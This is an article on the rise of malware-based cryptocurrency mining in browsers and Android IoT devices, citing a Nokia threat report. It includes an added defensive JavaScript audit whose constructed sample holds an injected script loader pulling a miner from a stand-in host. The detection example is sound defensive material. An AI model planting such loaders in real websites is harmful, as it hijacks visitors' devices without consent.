Report: malware based cryptocurrency mining is on the rise

According to the latest report from Nokia Threat Intelligence Lab, malware based cryptocurrency mining has expanded from targeting high end servers with specialized processors to targeting IoT devices, smartphones and even browsers. Further, the company has stressed the importance of this issue, as cryptocurrency mining will continue its upward trend in years to come.

Competing algorithms

The Bitcoin proof-of-work algorithm is not very friendly to regular processing technology. It works much faster on specialized ASICs, FPGAs and GPUs. Because of this, economic Bitcoin mining is usually done on specialized equipment in locations where cheap electricity is available. Competing technologies, such as Monero, use algorithms that can be run economically on regular computer hardware. This has led to a situation where cryptocurrency mining is being conducted in IoT bots, mobile phones and even in web browsers. On its own, a single computing device is not powerful enough to make any money, but when combined in a botnet it becomes financially viable.

Mining in the browser

According to the security report, malicious code named RiceWithChicken is JavaScript that does cryptocurrency mining in the browser. RiceWithChicken is a modified version of CoinHive, a commercial Monero cryptocurrency mining service that offers to help monetize websites for their owners. While CoinHive clearly advertises its presence on websites, RiceWithChicken performs its mining operations without the permission of the website owner or the knowledge of the visitors to that website.

Links to the RiceWithChicken coin miner have been placed onto many compromised websites, typically in a poorly secured JavaScript file. In many cases, multiple copies of this link are injected into the same file, likely due to the usage of automated toolsets by those responsible. In the example below, a copy of a jQuery library was the scene of the code injection.

The user surfing to the compromised website will not be aware of this activity going on in the background. They will be able to continue to browse the site’s content without issues, other than experiencing significantly poorer performance on their device. Because this is a browser-based threat, the impact will be felt regardless of what type of device is being used to browse to the site. The cryptocurrency miner will continue running until the browser is shut down. On a mobile phone, the browser usually continues to run in the background when the user switches to another task, so the coin-miner will continue consuming CPU and draining the battery for some time.
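A site owner can catch the kind of injection described above by comparing each deployed script against a pristine vendor copy and flagging URLs that appear only in the deployed file, along with how many copies were added. This is an added example, not code from the Nokia report; the file contents and host names are constructed placeholders.

```javascript
// Added example: compare a deployed JavaScript library with a pristine copy.
// All file contents and host names here are constructed for illustration.

// Count every absolute or protocol-relative URL referenced in a text.
function countUrls(text) {
  const counts = new Map();
  const urlRe = /(?:https?:)?\/\/[a-z0-9.-]+\.[a-z]{2,}[^\s'"<>)\\]*/gi;
  for (const url of text.match(urlRe) || []) {
    counts.set(url, (counts.get(url) || 0) + 1);
  }
  return counts;
}

// Extract the lower-cased host name from a URL found by countUrls().
function hostOf(url) {
  return url.replace(/^(?:https?:)?\/\//i, '').split(/[\/:?#]/)[0].toLowerCase();
}

// Report URLs that occur more often in the deployed file than in the
// pristine one, with the number of extra copies. Working on URL counts
// (not line diffs) also covers minified, single-line libraries.
function auditLibrary(pristine, deployed) {
  const before = countUrls(pristine);
  const findings = [];
  for (const [url, count] of countUrls(deployed)) {
    const copies = count - (before.get(url) || 0);
    if (copies > 0) findings.push({ url, host: hostOf(url), copies });
  }
  return { modified: pristine !== deployed, findings };
}

// Constructed sample: a stand-in library and the same file after an
// automated tool appended three identical external script loaders.
const PRISTINE = [
  '/*! sample-lib v1.0 | https://vendor.example/license */',
  'window.sampleLib = { version: "1.0" };',
].join('\n');
const INJECTED =
  'var s = document.createElement("script"); ' +
  's.src = "https://miner.example.invalid/m.js"; document.head.appendChild(s);';
const DEPLOYED = PRISTINE + '\n' + [INJECTED, INJECTED, INJECTED].join('\n');

const report = auditLibrary(PRISTINE, DEPLOYED);
console.log(JSON.stringify(report, null, 2));
```

A finding with more than one copy matches the repeated-injection pattern the report attributes to automated toolsets; the vendor's own license URL is ignored because it is present in both files.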

Mining in IoT botnets

A number of cryptocurrency miners are now targeting IoT devices. An example of this is the ADB.Miner bot that exploits Android based IoT devices that have an open Android Debug Bridge (ADB) port. ADB is used by developers to debug Android applications and is not normally left open on production devices. However, apparently some Android based smart TVs, set-top-boxes, tablets and other Android based IoT devices have been deployed accidentally with this debug port open. This effectively gives the attacker shell access over the network. The coin mining software is loaded via a shell script and the device becomes part of the ADB.Miner botnet. It not only starts to mine coins 24/7, but like other Mirai based bots, it also scans the local network and the internet looking for other victims.
